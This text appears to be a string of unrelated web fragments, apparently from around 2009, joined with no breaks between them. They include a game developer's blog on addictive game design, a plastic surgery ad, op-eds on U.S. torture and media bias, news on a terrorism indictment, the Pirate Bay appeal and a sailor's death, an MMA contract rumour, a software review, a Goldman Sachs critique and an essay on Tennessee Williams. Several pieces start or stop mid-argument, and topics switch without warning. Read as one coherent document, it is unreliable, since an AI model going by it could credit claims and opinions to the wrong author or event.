For gamers who actually care about this list , it 's a good enough reason to buy a game on Steam instead of directly from the developer , or buy it on XBox 360 instead of PS3 .
This game is all about upgrading everything with virtual money .
You have to upgrade not only your space ship , but the main menu , the preloader , the graphics , and so on .
I found this game addictive because it made me feel like I was accomplishing something , even though the ' upgrades ' were obviously meaningless .
This helps illustrate why games like The Sims and World of Warcraft are so successful .
Even with very simple gameplay , it 's satisfying and addictive to feel like you 're improving yourself and your environment .
Released in 2002 , Progress Quest is one of the earlier games of this type .
Once you pick a race and class and roll your stats , Progress Quest plays itself without any user intervention .
Your character executes monsters , gains xp and gold , and improves his equipment and level .
Since it has no graphics , sounds , or controls , Progress Quest did not leave a great first impression for me , but as I left it in the background , I started to appreciate why it 's so popular .
Whenever I checked it , my character had gone up a few levels , was farther along in the quest , and had better equipment .
I was making progress , even if I was n't doing anything in the real world !
After leaving it going long enough , the sunk cost fallacy started to kick in again .
I can't stop now ; I 've made so much progress already !
For Progress
Quest it was a minor effect , but this is the same logic that casinos use to keep gamblers hooked , and the same logic that Blizzard uses to keep users subscribed to World of Warcraft .
Once we invest enough time or money in something , it can be almost physically painful to stop -- it means we have to admit that it was all for nothing .
I 've already mentioned this game , but it is once again relevant .
The Linear RPG distills standard JRPG gameplay to its essence .
JRPG games hook gamers with a dangerous combination of level grinding and story progression .
Stories are effective tools for creating game addiction because it's very uncomfortable to know only half of a story , no matter how silly or nonsensical the story might be .
Gamers will go through almost anything to reach the end .
By adding repetitive gameplay like level grinding ( addictive in its own right due to sunk cost ) , it 's possible to stretch a short story and small game world to last hundreds of hours .
The Linear RPG only lasts for a few minutes , but it is much more fun and compelling than it seems like it should be -- showing how powerful this combination can be .
Ethics of addiction
Using tools like unearned rewards , achievements , stretched stories and upgrades , it 's possible to create very addictive games that require little skill or effort to play .
This ease of entry would allow us to reach a much broader audience , and the addiction would ensure that players tell each other about it .
If our craftsmanship is good enough , then we could make a lot of money doing this , and many people do .
However , this is not our plan for Overgrowth .
There 's a vital question that is rarely asked : does our game make players happy when they play , or just make them sad when they stop ?
This is a subtle distinction , and irrelevant to sales , but I think it 's very important .
Medicine and heroin both sell for a high price , but I would sleep better at night selling one than the other .
Do you have any ideas on how we can tell the difference between games that are legitimately fun , and games that are just hollow addiction ?
Compassionate , Personalized Care
If you are considering plastic surgery in Oklahoma City , OK , you deserve an outstanding doctor who respects your privacy and aesthetic goals .
Dr. Justin Jones at Jones Plastic
Surgery provides a comfortable , discreet environment with an emphasis on patient education and individualized planning to ensure the satisfaction of every patient .
Dr. Jones is highly experienced in advanced techniques such as the Keller funnel to provide breast implants with smaller incisions and a lower risk of infection or capsular contraction .
He can perform any breast , body , and non-surgical treatment with natural - looking results to enhance your figure and boost your confidence .
Secrecy is endemic in all governments .
It goes with the turf , especially if their leaders hope to hide illegal or immoral behavior , such as torture of foreign prisoners .
Many Americans heaved a sigh of relief last January when President Barack Obama banned the torture of prisoners at Guantanamo Bay , Cuba .
It made the administration look more humane than the Bush - Cheney team .
But that is not the whole story .
Obama left unaddressed the possibility of torture in secret foreign prisons under our control as in Abu Ghraib in Iraq or Bagram in Afghanistan , not to mention the ' black sites " sponsored by our foreign clients in Pakistan , Saudi Arabia , Jordan , Israel , Thailand and other countries .
" The United States will not torture , " Obama said in his directive .
But he has been silent on the question of whether the U.S. would help others do the torturing .
Members of Congress knew a lot about U.S. torture practices .
But Republicans loyal to the Bush administration and Democrats , too , played along and kept silent at the horror of it all .
Why did no bells ring for the U.S. lawmakers -- particularly those privy to the brutality -- when briefed on the abusive treatment of the captives .
Did they owe more allegiance to the CIA than to the honor of our country ?
SCROLL TO CONTINUE WITH CONTENT Never Miss a Beat .
Get our best delivered to your inbox .
There are hair - raising reports of methods that Americans -- including private contractors -- have used to coerce information from our prisoners .
They include slamming a prisoner against a wall ; denying him sleep and food ; waterboarding him under so - called enhanced interrogation ; and keeping him in a crate filled with insects .
I remember when President Ronald Reagan , marveling at the courage of American soldiers , used to say : " Where do we get such men ? "
And I have to ask : " Where did we get such people who would inflict so much pain and ruthlessness on others ? "
William Rivers Pitt , a best - selling author who wrote " The Greatest Sedition is Silence , " recently raised the emotional question of whether U.S. adoption of torture has debased the international standards for treatment of prisoners and that our enemies may now feel that they can torture Americans .
Pitt specifically expressed concern about Army Pvt. Bowe Bergdahl , who was captured by the Taliban in Afghanistan last month .
American military leaders had warned President Bush over and over that U.S. torture of prisoners could boomerang against our troops .
But he would not listen .
Obama has blocked publication of pictures of the harsh treatment of prisoners from our two ongoing wars -- in Iraq and Afghanistan -- but the word still gets around .
The Civil Service Commission ( CSC ) said the number of Druze and Arabs employed in the ranks of the civil service has increased from 193 to 578 over the past six years .
According to the CSC , while in 2003 only 4.2 % of its employees were Druze or Arabs , they now constitute 11.6 % of civil service personnel .
Also , the number of Druze and Arab women now employed by the various government bureaus rose from 66 in 2003 , to 282 in 2008 .
The data further revealed that that 70.9 % of all Druze and Arab workers have an academic education , 11.4 % of them have PhDs and 9.2 % have a Master 's degree .
The Civil Service Commission also said that 36 % of Druze and Arab workers were employed by the Interior Ministry , 16 % by the Science and Technology Ministry , 8.5 % by the Ministry of Social Affairs , 8 % by the Health Ministry and 7 % are employed by the Education Ministry .
The Prime Minister 's Office and the Foreign Ministry round up the list with only 1 %- 1.5 % Druze or Arabs among their personnel .
The Ministry for the Development of the Negev and Galilee and the Ministry of Pensioner Affairs have no Druze or Arabs employees .
We go on the trail of 26 once forgotten ruins you really can visit .
Mesa Verde , Colorado
Andrew Gumbel writes : " The first white man to set eyes on the extraordinary ancient cliff dwellings dug into the canyons of Mesa Verde in south - western Colorado was Richard Wetherill , a Quaker rancher .
After stumbling across the perfectly preserved relics of a long - vanished native civilisation he decided to recruit his brothers and some trusted friends to explore the canyons further .
The result was the establishment of one of the United States 's most breathtaking national parks , an eerily evocative landscape of plunging canyons and snow - kissed peaks , where the ancient Anasazi civilisation laid down roots and enjoyed 200 years of extraordinary prosperity before vanishing almost overnight around the year 1300 . "
A media environment that tilts to the right is obscuring what President Obama stands for and closing off political options that should be part of the public discussion .
Yes , you read that correctly :
If you doubt that there is a conservative inclination in the media , consider which arguments you hear regularly and which you do n’t .
When Rush Limbaugh sneezes or Newt Gingrich tweets , their views ricochet from the Internet to cable television and into the traditional media .
It is remarkable how successful they are in setting what passes for the news agenda .
The power of the Limbaugh - Gingrich axis means that Obama is regularly cast as somewhere on the far left end of a truncated political spectrum .
He ’s the guy who nominates a “ racist ” to the Supreme Court ( though Gingrich
retreated from the word yesterday ) , wants to weaken America ’s defenses against terrorism , and is proposing a massive government takeover of the private economy .
Steve Forbes , writing for his magazine , went so far recently as to compare Obama ’s economic policies to those of Juan Peron ’s Argentina .
Democrats are complicit in building up Gingrich and Limbaugh as the main spokesmen for the Republican Party , since Obama polls so much better than both of them .
But the media play an independent role by regularly treating far right views as mainstream positions and by largely ignoring critiques of Obama that come from elected officials on the left .
This was brought home at this week ’s annual conference of the Campaign for America ’s Future , the progressive group that supports Obama but worries about how close his economic advisers are to Wall Street , how long our troops will have to stay in Afghanistan , and how much he will be willing to compromise to secure health care reform .
In other words , they see Obama not as the parody created by the far right , but as he actually is : a politician with progressive values but moderate instincts who has hewed to the middle of the road in dealing with the economic crisis , health care , Guantanamo and the war in Afghanistan .
While the right wing ’s rants get wall - to - wall airtime , you almost never hear from the sort of progressive members of Congress who were on an America ’s Future panel on Tuesday .
Reps. Jared Polis of Colorado , Donna Edwards of Maryland and Raul Grijalva of Arizona all said warm things about the president — they are Democrats , after all — but also took issue with some of his policies .
All three , for example , are passionately opposed to his military approach to Afghanistan and want a serious debate over the implications of Obama ’s strategy .
“ If we do n’t ask these questions now , ” said Edwards , “ we ’ll ask these questions 10 years from now — I guarantee it . ”
Polis spoke of how Lyndon Johnson ’s extraordinary progressive legacy “ will always be overshadowed by Vietnam ” and said that progressives who were challenging the administration ’s foreign policy were simply trying to “ protect and enhance President Obama ’s legacy by preventing Afghanistan and Iraq from becoming another Vietnam . ”
As it happens , I am closer than the progressive trio is to Obama ’s view on Afghanistan .
But why are their voices muffled when they raise legitimate concerns while Limbaugh ’s rants get amplified ?
Is n’t Afghanistan a more important issue to debate than a single comment by Judge Sonia Sotomayor about the relative wisdom of Latinas ?
Polis , Edwards and Grijalva also noted that proposals for a Canadian - style single - payer health care system , which they support , have fallen off the political radar .
Polis urged his activist audience to accept that reality for now and focus its energy on making sure that a government insurance option , known in policy circles as the “ public plan , ” be part of the menu of choices offered by a reformed health care system .
But Edwards noted that if the public plan , already a compromise from single - payer , is defined as the left ’s position in the health care debate , the entire discussion gets skewed to the right .
This makes it far more likely that any public option included in a final bill will be a pale version of the original idea .
Her point has broader application .
For all the talk of a media love affair with Obama , there is a deep and largely unconscious conservative bias in the media ’s discussion of policy .
The range of acceptable opinion runs from the moderate left to the far right and cuts off more vigorous progressive perspectives .
Democrats love to think that Limbaugh and Gingrich are weakening the conservative side .
But guess what ?
By dragging the media to the right , Rush and Newt are winning .
E.J. Dionne ’s e-mail address is ejdionne ( at) washpost.com .
After sunset , Tokyo Gundam comes to life .
[ +]
[ +]
[ +]
[ +]
[ +]
[ +]
[ +]
[ +]
July 27 , 2009  --
Seven North Carolina men have been charged with plotting to wage " violent jihad " by " murdering , kidnapping or maiming persons " overseas .
According to a federal indictment unsealed today , the alleged ringleader , Daniel Patrick Boyd , and six co-defendants were accused of conspiring to provide financial and material assistance to terrorists abroad .
The indictment does not allege the men planned to attack targets within the U.S .
Click here to read the indictment .
Detention hearings for Boyd and the other six defendants arrested have been scheduled for July 30 , 2009 .
Boyd had traveled extensively in Pakistan and Afghanistan between 1989 and 1992 , where he received military training in terrorist training camps , according to the indictment .
According to officials briefed on the case , Boyd was believed to be armed when he would leave his home and is also believed to have broken away from local mosques years ago .
He allegedly taught his own Islamic courses at his home and held services there .
Prosecutors say over the last three years , Boyd and his co-defendants raised funds and weapons to assist terror efforts and recruited homegrown extremists to travel abroad to wage jihad .
Two of Boyd 's sons , Dylan and Zakariya , were charged with taking part in the alleged conspiracy .
" These charges hammer home the point that terrorists and their supporters are not confined to the remote regions of some far away land but can grow and fester right here at home .
Terrorists and their supporters are relentless and constant in their efforts to hurt and kill innocent people across the globe .
We must be equally relentless and constant in our efforts to stop them , " said U.S. Attorney George E.B. Holding .
The FBI and Justice Department have filed their intention to use information obtain by secret Foreign Intelligence Surveillance Act wiretaps in the case .
Authorities say Boyd and several of the other defendants traveled to Israel in June of 2007 in a failed attempt to conduct terrorism activities .
After returning to the U.S. , Boyd was able to successfully train and fund a recruit to travel to Kosovo last July to wage jihad , according to the indictment .
FBI agents raided Boyd 's home in Caswell County , NC today , where authorities believe he had stockpiled automatic weapons and trained recruits .
" The threat that extremists and radicals pose to America and our allies has not dulled or gone away , " said Owen D. Harris , Special Agent in Charge of the Charlotte Division of the FBI .
" These arrests today show there are people living among us , in our communities in North Carolina and around the US , that are honing their skills to carry out acts of murder and mayhem . "
Click Here for the Blotter Homepage .
The four Pirate Bay co-founders were convicted of copyright infringement by an unbiased judge , the Stockholm District Court told an appeals court Monday .
The district court made the statement to the Svea Court of Appeal in Sweden .
It was in response to accusations by the defendants that they should get a retrial because the judge , Tomas Norstrom , was a member of pro-copyright groups .
" The memberships are simply a means to gain increased knowledge of copyright legislation issues and are not therefore grounds to establish bias , the Stockholm court told the court of appeals , " according to Swedish media .
" On the contrary , the court argued , it is imperative that judges remain abreast of the issues . "
Days after the April convictions , attorneys for the four charged that Norstrom was hostile to the defense because of his affiliations with the Swedish Copyright Association and the Swedish Association for the Protection of Industrial Property .
The court 's comments came a day after Sweden 's Pirate Party won a seat in the European Parliament – in part as a backlash against the convictions
Pirate Bay administrators Fredrik Neij , Gottfrid Svartholm Warg and Peter Sunde were found guilty in the case , along with Carl Lundström , who was convicted of funding the five - year - old operation .
Pending the outcome of their appeals , they each face a year in prison and $ 3.8 million in fines .
The defendants also charged that the Stockholm trial court secretly steered the case to Norstrom , an assertion the Stockholm court flatly rejected Monday .
See Also :
Lawmaker wants more answers in gay sailor 's death Jackson Lee wants deeper look into sailor death
Family says he was harassed because he was gay
U.S. Rep. Sheila Jackson
Lee called Sunday for an investigation into the death of a Houston sailor who was shot to death while on duty in California last month .
Navy Seaman August Provost III , 29 , was killed June 30 at Marine Corps Base Camp Pendleton in Southern California , where he was standing watch at a base compound .
Navy officials said Provost , who grew up in Houston 's Acres Homes neighborhood , was shot to death and his body burned .
Provost 's family has speculated that the shooting might have been a hate crime , because the sailor was gay .
“ I am requesting a full investigation into the murder , ” Jackson Lee said Sunday .
“ This death appears bizarre , and more facts need to be uncovered . ”
Navy officials said earlier this month that they had linked another sailor to the crime through physical evidence and his own statement .
The sailor was taken into custody and was cooperating with the investigation , said Capt .
Matt Brown , a spokesman for Navy Region Southwest in San Diego , Calif .
“ There is no information that suggests this is a hate crime , but we will address any possible motivation as part of the investigation as we continue to thoroughly examine the many leads and facts in this case , ” Brown said earlier this month .
Jackson Lee stood with Provost 's parents on Sunday to call for a deeper investigation .
“ I'm asking for a system - wide investigation , to see whether these acts are being tolerated in our military , ” Jackson Lee said .
“ I 'm appalled and outraged at the lack of facts that have been given to this family . ”
Provost 's mother , Melanie Provost , said Sunday the military originally told her simply that her son had been found unconscious in the guard shack and later died .
“ The only way I found out my son had been shot and burned was on TV , ” she said .
Her son had mentioned to her before he died that he was being harassed by some fellow sailors , but he handled it stoically , she said .
Jackson
Lee said the incident should lead the military to be less tolerant of similar harassment .
“ If he was being harassed , why was the bad behavior being covered up ?
Why was the person still there ? ” Jackson Lee said .
The congresswoman would like to see the military 's “ Do n't Ask , Don't Tell ” policy toward gay service members lifted , but says other changes are needed to prevent discrimination of all kinds .
Family members say that policy played a part in Provost 's poor treatment in the Navy , however .
“ Because of ‘ Do n't Ask , Don't Tell , ' he could n't say anything , ” said his niece , Keonna Johnson - Jones .
“ He could n't go to his superiors . ”
Provost 's mother said she wants to ensure that no other military mothers have to endure what she has .
“ He loved the Navy .
There was n't anything he would n't do for the Navy , ” she said .
“ But they did n't protect him . ”
jennifer.latson@chron.com
OTTAWA–Industry Minister Tony Clement says his government had to consider " regional fairness " when doling out stimulus money to big tourism events – and that 's why a gay arts festival in Montreal did n't make the cut .
The organizers of Montreal 's Divers - Cite festival , which features gay and lesbian performers from around the world , said they were shocked to find out this week that their application for funding under the new program had been rejected .
They had been told by bureaucrats they had met all the rigorous criteria for their $ 155,000 bid – a fact not disputed by the government .
Director Suzanne Girard had initially scoffed at suggestions that ideology might be at play in handing out grants , but now says she suspects politics were involved .
After some Conservative caucus members complained last month that Toronto 's Pride Week had received $ 400,000 , junior tourism minister Diane Ablonczy lost responsibility for the file .
But Clement said Wednesday there had been an " avalanche " of applications under the $ 100 - million Marquee Tourism Events Program and decisions had to be made .
He noted that Quebec received about 42 per cent of the total funds , roughly the same as the province of Ontario .
" I think we 've been treating Montreal and Quebec very fairly , but it's also important for us to fund other things outside of Montreal , and outside of the province of Quebec , so we have some regional fairness , " Clement said in Red Deer , Alta .
But Luc Fournier , director of an umbrella organization for Quebec 's major international events , says the department has known from the outset that the province 's festival circuit is the most powerful in the country and might scoop up a large proportion of the funds .
Just for Laughs and the Montreal International Jazz Festival received half of the Quebec total of $ 12 million .
Only large - scale events across Canada that could prove they attract significant numbers of tourists met the criteria to apply .
" I told them many times that with the criteria they had , they would n't be able to fund events in the Maritimes and the Prairies , or very few , " said Fournier , of the Regroupement des evenements majeurs internationaux .
" If Industry Canada is saying that Quebec is getting more , well , with the criteria that we received we already told them that . "
Opposition critics and Girard point out there is nothing in the program 's initial description that refers to regional distribution of funds .
" Was there a rule there saying that there 's a certain percentage per province ?
I did n't hear that , " said Liberal MP Pablo Rodriquez , the party 's heritage critic .
" So again , they 're using this excuse , because they can't say openly what they 're doing , which is getting involved in the content . "
Fairness did n't seem to enter into the equation when it came to dividing up the money within Quebec , said the head of Quebec 's biggest gay event .
Robert Vezina , president of the Black and Blue festival , says he can't understand why the French music festival FrancoFolies received $ 1.4 million in funding , when other events such as his bring in affluent , international visitors and ask for a fraction of that amount .
Black and Blue was rated second after Montreal 's now defunct Grand Prix for the amount of money tourists spent per capita while in the city .
" I have nothing against FrancoFolies , but divide the pie a little bit , " said Vezina , who is waiting to hear the outcome of his application for $ 125,000 .
" It does n't make sense . . . .
Gay and lesbian events are starving to death . "
The tourism events program was welcomed warmly in the festivals industry , particularly after the old sponsorship program under the Liberals basically disappeared .
Still , some have raised questions about how late the funds were distributed .
Industry Canada initially said announcements would be made in the early summer , to allow events to beef up their programming and promotion .
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Instead , festivals have sometimes found out in the middle of their event that they had received the funding .
Divers - Cite only found out days before their event was set to begin that they would not get any money .
Clement has said the program will be reviewed as will all other programs associated with economic stimulus .
Read more about :
Early last May , I attended a town - hall meeting of undergraduates at Harvard University in Cambridge , Massachusetts .
The topic that evening : cost -cutting .
As I settled into my chair , in Boylston Hall , student activists , members of the “ Student Labor Action Movement , ” were making their way through the auditorium , handing out flyers .
“ Rethink .
Resist , ” urged the bold black letters .
It was a call to action .
“ no layoffs ! ”
At the top of the printed page was Harvard ’s historic coat of arms : three small open books .
Cleverly , the university ’s Latin motto — normally inscribed on the books as “ ve - ri - tas “ — had been replaced with a near anagram , “ av - ar - ice . ”
[ #image : / photos / 54cbf3e1fde9250a6c402f84 ]
|| |How did we get into this mess ?
Visit our archive “ Charting the Road to Ruin . ” Illustration by Edward Sorel .
|
| |
Ignoring the agitators as best he could , Michael Smith , dean of the Faculty of Arts and Sciences , Harvard ’s biggest division , called the meeting to order .
Sitting casually on a desk , wearing jeans and a short - sleeved polo shirt , Smith , a professor of engineering and applied sciences , and a former competitive swimmer , looked more like an athlete than an administrator .
He got straight to the point : his division — which includes Harvard College , the Graduate School of Arts and Sciences , and the School of Engineering and Applied Sciences — was facing a budget deficit of $ 220 million .
That ’s a huge sum : $ 220 million !
Nearly 20 percent of the Faculty of Arts and Sciences ’ current budget had to be cut .
“ That frightens me , ” Smith said forthrightly .
“ It should frighten you .
We obviously ca n’t sit around and do nothing .
We ’ve got to find a way to try and get the income back in alignment with the expenses . ”
To read the complete story , pick up a copy of The Great Hangover : 21 Tales of the New Recession from the Pages of Vanity Fair* *( Harper Perennial ) , available online and at better booksellers now .
Who went out of his way to help Griffin ?
UPDATE
Not wrong to seek counsel for killers .
Simply curious that the only time joe [...] does it , it ' is for a domestic terrorist , eh ?
: Allow me to add this , as iterated by Shoq , the author of the Tweet : Agreed .
Our point is not that he found a lawyer for him , it 's that when he goes out of his way to do so , it 's for an extremist like Griffin .
Looks like the story 's growing .
Aww , what a shame for ol ' MoJo .
Let the speculation begin .
According to Chad Dukes of The Lavar Arrington Show With Chad Dukes on 106.7
The Fan and announced on air today , a source apparently is telling him that the deal Strikeforce has offered Fedor Emelianenko and M - 1 would be for $ 1 million per fight : $ 500 k from Strikeforce and $ 500 k from CBS for 6 fights ( not sure about what happens when he does n't fight on CBS or perhaps these are all CBS fights ? ) .
Any fight would be co-promoted with M - 1 and the contract would be non-exclusive .
While I was adamant yesterday about the UFC's offer being excellent for Emelianenko , if these details are true the Strikeforce deal is excellent as well .
It certainly is n't as financially lucrative as what the UFC has put together , but the clear obstacle of co-promotion is entirely removed .
Here 's the rub : Five Knuckles is reporting something similar , but slightly different :
A source close to Emelianenko's camp has informed FiveKnuckles.com that Emelianenko has received an offer from Strikeforce which includes a non-exclusive contract for between $ 500,000 and $ 700,000 per fight , guaranteed exposure on CBS shows and a cut of any PPV event he was a part of .
I suppose this could actually be the same offer since a six - fight deal with Emelianenko implies a few of those fights would likely be on Showtime or PPV and not all CBS .
The only detail I can add is that this is all similar to what I 've been hearing and in fact , more lucrative .
Stay tuned for information as it streams in .
Oh yeah , and does anyone else get the feeling that the UFC 's mostly laissez - faire attitude towards Strikeforce is about to come to a screeching halt ?
It 's just a guess and I do n't blame Strikeforce for trying to capture the sport's top free agent when the opportunity presents itself , but I do n't think it comes without significant reprisal .
There is no such thing as a free lunch .
UPDATE by Kid Nate : Some more from the Fedor / M - 1 side of the fence per Jonathan Snowden :
“ The actual guarantee offered Fedor was less than $ 2 million .
The other money would only come into play if the PPV ’s did extremely well , ” Snowden said .
“ Fedor was not offered a $ 5 million guarantee .
It is also important for the entire Russian crew to have a chance to help grow the sport there .
Although Fedor can make more money now in the UFC than he likely can elsewhere , it would n’t allow an opportunity to expand Russian MMA . ”
and :
Windows only :
We 've already shown you how you can browse through files from the Stacks widget in the upcoming Snow Leopard release — but you can get that feature right now on your Windows PC .
Advertisement
We 've mentioned StandaloneStack before , but the latest version adds a host of new features — a complete overhaul of the settings , video thumbnail animations , custom icons , a toggle option instead of always hiding , but the best new feature is the ability to browse down through folders right from the Stack widget itself .
Advertisement
Once you 've downloaded and extracted the StandaloneStack utility , you can simply launch it to access the settings panel — from there , you can go to New Stack on the left - hand pane , pick a folder and choose your options , and then click the Create Stack button to actually create a new stack .
To access the stack , you 'll want to use the Create Shortcut on Desktop button , and then you can drag that shortcut anywhere you 'd like — if you are running Windows 7 it's a perfect time to right - click and choose " Pin to Taskbar " — though you may want to change the shortcut icon before pinning to the taskbar .
Advertisement
One of the very interesting features is the ability to completely customize the icons used in the Stack — there 's a whole set of icons found in the Images folder , but you can customize your own icons by replacing them with a PNG icon of your choice .
Advertisement
Once you 've created , customized , and tweaked your perfect configuration , the stacks are easy to use — just click on folders to browse down through them , or use the " Go Back " icon to go up a folder .
If you choose the " Do n't close stack on focus lost " option , the stack can be toggled off by simply clicking the icon again — otherwise it will disappear once you 've switched to another application .
Advertisement
This is , quite simply , a must - have application for tweaking your dock — and an excellent companion for the new dock - like Windows 7 taskbar .
For more Leopard - style eye- candy , pair it with the Nexus Dock .
Advertisement
StandaloneStack [ Chris 'n ' Soft ]
Then the reserve of popular investment post - mortems fattens , and suddenly there 's a lengthy litany of new complaints about Goldman : pumping , laddering , spinning .
Eric Martin defends Taibbi on the grounds that it 's all true .
I myself firmly believe that these things are true ( she said , looking demurely over her shoulder at the nice man from Legal ) .
But it 's all old , old news .
It 's not even a particularly well - written or thoughfully analyzed summary of the exhaustive treatments of the subject by the fuzzy headed moderate business journalists Taibbi disdains .
Investment banks treated their clients disgracefully during the internet bubble , and a lot of the clients were managers who did the same to their shareholders .
But what does this have to do with the current financial crisis ?
Perhaps more to the point , how is it a special indictment of Goldman , the ostensible topic of his piece ?
Other banks did more and worse .
Even as an indictment of the system this thing is lacking , and showcases Taibbi 's lack of fundamental conceptual understanding .
He complains about CDO's on the grounds that Goldman hid the atrocious risks inside a fancy dan derivative package that no one could understand .
But in fact , everyone was aware that CDO 's were repackaging crap mortgages -- that was the point .
The idea was pure portfolio theory , broadly agreed upon by everyone involved .
Everyone knew a lot of the mortgages might go bad , either by defaulting or prepaying .
( This is a risk for bankers , who do n't like the idea that if interest rates drop , their 7 % mortgage might suddenly turn into a pile of non-interest - bearing cash which can only be invested at 5 % . )
But if you pool the risk , only some of the bonds will go bad , while others pay off .
The result is a less risky , less volatile investment than any individual junk mortgage bond .
And it would have worked , too , if it had n't been for those crazy kids a collapse in the housing market of a scale not seen since the Great Depression .
Did individual portfolio managers take on too much risk ?
Yes .
Did some morons get sold these bonds without understanding what was going on ?
Undoubtedly .
But Goldman 's customers for CDOs are not little grannies who think a bond coupon is what you use to buy denture glue .
They 're institutions who could reasonably be expected to understand the risks .
Which is why it is not , as Taibbi absurdly claims , " securities fraud " for Goldman to sell people mortgage - backed CDOs when they themselves were moderately short the overall housing market .
" That 's how audacious these assholes are , " says one hedge - fund manager .
" At least with other banks , you could say that they were just dumb - they believed what they were selling , and it blew them up .
Goldman knew what it was doing . "
I ask the manager how it could be that selling something to customers that you 're actually betting against - particularly when you know more about the weaknesses of those products than the customer - does n't amount to securities fraud .
" It 's exactly securities fraud , " he says .
" It 's the heart of securities fraud . "
First of all , of course banks sell people positions they are n't themselves taking .
Sometimes the bank is right , and sometimes the customers are ; differences of opinion are what make marriages and horse races .
Second of all , the banks that went down , the ones that arguably caused the financial crisis , were long their own toxic waste ( and that of others ) .
Third of all , Goldman itself might argue that its mortgages were not as toxic as others , and for all I or Matt Taibbi know , they might be telling the truth .
Fourth of all , the disconnect between the underwriting and the customer side of the investment houses was not only legal , but in some cases , mandatory .
Excessive entanglement between the two is why Henry Blodget , whom Taibbi references elsewhere , has been banned from the securities industry for life .
That Taibbi could even ask how this was not securities fraud is really troubling .
Denny ’s is just setting itself up for a lawsuit .
JREF Communication Manager Jeff
Wagg went to Denny ’s recently where he saw the following flyer :
This is n’t the first time something like this has happened .
I mentioned a similar incident on this site a couple years ago — that one also took place in Euless , Texas — and Wagg has a list of several other incidents where non-churchgoers were discriminated against .
You can read Jeff ’s account of the story here .
The restaurant said this was a corporate policy and Jeff has sent headquarters a polite letter of complaint .
If anyone would like to call the corporate offices in the morning , their number is 1-800-733-6697 .
It would be nice if Christians could step up and call , too .
Even if the policy benefits you , it ’s not right and it ’s still discrimination .
On a side note , I wonder why Christians are getting the 10 % savings when some of them do n’t even tip on Sundays …
( Thanks to Zombie Girl for the link ! )
Who is Britain 's favourite American dramatist ?
One year it seems to be Arthur Miller , the next it 's David Mamet .
Right now , Tennessee Williams is having a moment .
Rachel Weisz opens in A Streetcar Named Desire tonight , at the Donmar in London .
In December , a Broadway African - American Cat On a Hot Tin Roof , starring James Earl Jones and Adrian Lester , comes to the West End .
And , in between , there is the European premiere of a forgotten 1937 play , Spring Storm , at the Royal & Derngate in Northampton .
But , for all our enthusiasm for Williams , I think we still get him subtly wrong .
He is most often dubbed a " psychological " dramatist , but this ignores his social and political radicalism – as well as his rich talent for comedy .
Of course , perceptions of Williams have evolved over the years .
When Streetcar was first seen in London in 1949 , in a production directed by Laurence Olivier and starring Vivien Leigh , Williams was viewed as a kind of filthy American sleaze - merchant .
The confrontation of Blanche Dubois and Stanley Kowalski sent the British press into a tizzy : Logan Gourlay in the Sunday Express spoke for many when he condemned the play as " the progress of a prostitute , the flight of a nymphomaniac , the ravings of a sexual neurotic " .
The play was attacked in Parliament as " low and repugnant " , and by the Public Morality Council as " salacious and pornographic " .
When Cat On a Hot Tin Roof had its British premiere in 1958 , it had to be presented under the polite fiction of a " club performance " – lest the broader public be corrupted by the discreet suggestion that its hero , Brick , is gay .
Thankfully , we have got over the idea that Williams is a sexual sensationalist .
Now , we tend to emphasise his lyric , compassionate side .
He has been described as " the poet of lost souls " , and we tend to dwell on his empathy with the spiritually wounded .
In this reading , the keynote line is that of the itinerant Val in Williams 's Orpheus Descending , who says : " We 're all of us sentenced to solitary confinement inside our own skins , for life ! "
I 'd be the last to deny Williams 's poignant poetry and echoing loneliness , but we overlook the more robust side of his talent .
His plays offer a devastating portrait of the ugly prejudices of the American south ; they acknowledge economic realities ; and , in the spirit of his admired Chekhov , are as comic as they are tragic .
For evidence of Williams 's strong social conscience – the product of his Episcopalian upbringing – you have to look at the life and letters , as well as the work .
Travelling through the American south - west in 1939 , he listened attentively to the stories of impoverished , workless families , and shared his meagre rations with their children .
He also loathed racism .
Appalled that he was unable to prevent The Glass Menagerie playing to all - white audiences in the capital , in 1947 Williams wrote to the New York Times that " any future contract I make will contain a clause to keep the show out of Washington while this undemocratic practice continues " .
He was influenced by the theories of Brecht 's collaborator Erwin Piscator , a German emigre who ran the Drama Workshop in New York and was instrumental in staging an early Williams one - acter , The Long Goodbye , in 1940 .
Williams 's early plays , in particular , often reveal a strong social purpose – a point proved by Trevor Nunn 's National theatre revival of Not About Nightingales .
Written in 1938 , this play vividly dramatised a group of prisoners challenging the Mussolini - like power of a brutal warden .
This anti-fascist instinct was one of Williams 's guiding principles .
In this sense , A Streetcar Named Desire is a test case .
For some , the play is a vindication of Stanley Kowalski , who finally gets his revenge on his sister - in - law , Blanche , who has intruded on his happy New Orleans home with her fancy airs ( no surprise to find John Osborne among the fervent Stanleyites , writing that " the female must come toppling down to where she should be – on her back " ) .
But there is another way of looking at the play , brilliantly articulated by the American director - critic Harold Clurman in 1948 .
For Clurman , Blanche represents " the martyred poetic instinct and aristocracy of feeling " , while Stanley is all muscle , lumpish sensuality and crude energy : his " mentality provides the soil for fascism , viewed not as a political movement but as a state of being " .
I think the play is not quite as black - and - white as that , and requires a more delicate balance of sympathy ; but he was spot - on in seeing Streetcar as " wholly a product of our life today " .
It was a direct response to late - 1940s America , in which a macho materialism prevailed over spiritual and artistic values .
Before Williams entered what he himself called his " stoned age " of the 1960s , when drink and drugs stifled his talent , his subject was America in the biggest , most political sense .
Even Camino Real , first performed in 1953 and apparently showing Williams at his most woozily symbolic , is a vivid metaphor for 1950s America .
Set in a crumbling plaza , the play brings together a group of doomed romantic idealists , including Don Quixote , Lord Byron , Casanova and Marguerite Gautier .
Far from being a hazy phantasmagoria , the play was a direct and passionate response to an America where , as Williams said , " the spring of humanity had gone dry " ; the fascist demagoguery of Senator McCarthy was all - pervasive .
Intriguingly , Camino Real appeared in the same year as Arthur Miller 's The Crucible , and was just as opposed to the ethos of the times ; Williams was among the first to protest at the withdrawal of Miller 's passport by the US state department .
Williams remained an implicitly political writer up to and including Orpheus Descending , first performed in 1957 .
Here , the heroine discovers that her father was killed by the Ku Klux Klan for his failure to practise racial discrimination .
Williams is known as an explorer of interior landscapes ; what we miss is his capacity to record , and to fight against , any form of prejudice , intolerance or oppression .
At his best , Williams pinned down America at its worst .
But for all his empathy , he saw the human condition – and his own especially – as faintly absurd .
I have some evidence for this , in my only encounter with him , on Radio 4's Start the Week in 1978 .
I had been asked to interview Williams about his nakedly autobiographical play , Vieux Carré , which had just opened in London .
